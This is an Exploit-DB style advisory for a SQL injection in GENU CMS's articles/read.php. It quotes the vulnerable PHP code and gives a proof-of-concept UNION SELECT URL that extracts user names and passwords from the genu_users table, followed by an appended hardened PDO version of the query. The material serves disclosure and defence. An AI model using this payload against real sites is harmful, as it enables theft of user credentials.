GENU CMS - SQL Injection

Author: hordcode security
type: webapps
platform: php
port: 
date_added: 2012-04-05 
date_updated: 2012-04-05 
verified: 1 
codes: OSVDB-80971 
tags: 
aliases:  
screenshot_url: http://www.exploit-db.com/screenshots/idlt19000/screen-shot-2012-04-05-at-43302-pm.png 
application_url: http://www.exploit-db.comGENU-2012.3.tar.gz

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
GENU CMS SQL Injection Vulnerability
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

bug found by h0rd h0rd[at]null.net
homepage http://h0rd.net
download http://www.gnew.fr/pages/download.php?file=GENU-2012.3.tar.gz
vulnerability in articles/read.php
vulnerable code:
[...]
include('./../includes/common.php');

page_header($lang['ARTICLES_READ_TITLE']);

if (isset($_GET['article_id']))
{
    // $_GET['article_id'] is concatenated into the SQL string unquoted and
    // without any validation or casting, so the attacker controls the end of the query.
    $sql->query('SELECT ' . TABLE_ARTICLES . '.article_date, ' . TABLE_ARTICLES . '.article_subject, ' . TABLE_ARTICLES . '.article_text, ' . TABLE_USERS . '.user_id, ' . TABLE_USERS . '.user_name
                 FROM ' . TABLE_ARTICLES . ', ' . TABLE_USERS . '
                 WHERE ' . TABLE_ARTICLES . '.user_id = ' . TABLE_USERS . '.user_id
                 AND ' . TABLE_ARTICLES . '.article_id = ' . $_GET['article_id']);
    $table_articles = $sql->fetch();
[...]

PoC exploit:
http://[host]/articles/read.php?article_id=null union select 1,concat(user_name,0x3a,0x3a,0x3a,user_password),3,4,5 from genu_users--
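Hardened form of the same read.php query, added here as an example and not part of GENU or this advisory. It assumes a PDO connection in $pdo (the advisory shows only GENU's own $sql wrapper, whose prepared-statement support is unknown) and the TABLE_ARTICLES / TABLE_USERS constants from includes/common.php.

```php
<?php
// Added example (not GENU's code): read.php with article_id validated and bound.
// Assumption: $pdo is a PDO handle created elsewhere in includes/common.php.
include('./../includes/common.php');

page_header($lang['ARTICLES_READ_TITLE']);

if (isset($_GET['article_id']))
{
    // Reject anything that is not a plain decimal integer before it gets near SQL.
    if (!ctype_digit((string) $_GET['article_id']))
    {
        http_response_code(400);
        exit('Invalid article_id');
    }
    $article_id = (int) $_GET['article_id'];

    // Table names come from trusted constants; the user value is a bound parameter,
    // so the string "null union select ..." can never change the statement's shape.
    $stmt = $pdo->prepare(
        'SELECT a.article_date, a.article_subject, a.article_text, u.user_id, u.user_name'
        . ' FROM ' . TABLE_ARTICLES . ' a'
        . ' JOIN ' . TABLE_USERS . ' u ON a.user_id = u.user_id'
        . ' WHERE a.article_id = :article_id'
    );
    $stmt->bindValue(':article_id', $article_id, PDO::PARAM_INT);
    $stmt->execute();
    $table_articles = $stmt->fetch(PDO::FETCH_ASSOC);
}
```

With the integer check in place, the PoC URL above is refused with a 400 before any query runs, and even a value that slipped past the check would be sent as an integer parameter rather than spliced into the statement.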